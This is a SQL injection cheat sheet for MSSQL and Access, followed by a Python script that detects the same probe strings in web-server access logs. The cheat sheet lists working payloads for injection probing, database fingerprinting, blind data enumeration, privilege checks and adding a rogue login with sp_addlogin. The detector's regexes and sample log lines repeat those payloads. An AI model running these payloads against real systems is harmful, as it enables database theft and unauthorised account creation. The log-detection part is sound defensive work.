1. Check whether the parameter is injectable: ;and 1=1  ;and 1=2
2. Initial check for MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [query condition] and ''='
4. For a search field whose parameter is not filtered: 'and [query condition] and '%25'='
5. Identify the database system:
;and (select count(*) from sysobjects)>0   -> mssql
;and (select count(*) from msysobjects)>0  -> access
6. Guess the database name: ;and (select Count(*) from [database name])>0
7. Guess the column name: ;and (select Count(column_name) from database_name)>0
8. Guess the length of a record in the column: ;and (select top 1 len(column_name) from database_name)>0
9. (1) Guess the ASCII value of a column (Access):
;and (select top 1 asc(mid(column_name,1,1)) from database_name)>0
(2) Guess the ASCII value of a column (MSSQL):
;and (select top 1 unicode(substring(column_name,1,1)) from database_name)>0
10. Test the privilege structure (MSSQL):
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11. Add MSSQL and system accounts:
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
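Added example, not part of the original cheat sheet: a small Python detector that flags the probe strings listed above in web-server access logs, so that the enumeration sequence (1=1/1=2, sysobjects/msysobjects, IS_SRVROLEMEMBER, sp_addlogin) from one client can be spotted. The rule names, regexes and log lines are constructed for this example.

```python
# Added example, not from the original cheat sheet: flag the probe patterns
# listed above in web-server access logs. Log lines below are constructed.
import re
from urllib.parse import unquote_plus

# Rules run against the URL-decoded, lower-cased request target, so that
# %27 / + encodings do not evade them (double encoding is not unwrapped here).
RULES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b")),            # and 1=1 / and 1=2
    ("string-probe", re.compile(r"'\s*and\s+.+?\s+and\s*'%?'\s*=\s*'")),  # 'and ... and ''='
    ("mssql-fingerprint", re.compile(r"\b(sysobjects|is_srvrolemember|is_member)\b")),
    ("access-fingerprint", re.compile(r"\bmsysobjects\b")),
    ("char-enumeration", re.compile(r"\b(asc\s*\(\s*mid|unicode\s*\(\s*substring|top\s+1\s+len)\s*\(")),
    ("account-creation", re.compile(r"\bsp_addlogin\b|\bsp_password\b")),
]

SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=12;and+1=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=12;and+1=2 HTTP/1.1" 200 311
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=12;and+(select+count(*)+from+sysobjects)>0 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.asp?q=a%27and+1=1+and+%27%25%27=%27 HTTP/1.1" 200 2000
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.asp?id=12;and+1=(select+IS_SRVROLEMEMBER(%27sysadmin%27));-- HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /news.asp?id=12;exec+master.dbo.sp_addlogin+test;-- HTTP/1.1" 500 0
"""

def classify(line: str) -> list[str]:
    """Names of every rule that fires on one Common Log Format line."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
    target = unquote_plus(m.group(1) if m else line).lower()
    return [name for name, rx in RULES if rx.search(target)]

def scan(log: str) -> dict[str, list[str]]:
    """Map each client IP to the distinct rules it triggered, in first-seen
    order; a 1=1 -> fingerprint -> role check -> account-creation chain from
    one IP is the enumeration sequence this cheat sheet describes."""
    hits: dict[str, list[str]] = {}
    for line in log.splitlines():
        names = classify(line)
        if names:
            bucket = hits.setdefault(line.split(" ", 1)[0], [])
            bucket.extend(n for n in names if n not in bucket)
    return hits

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(names))
```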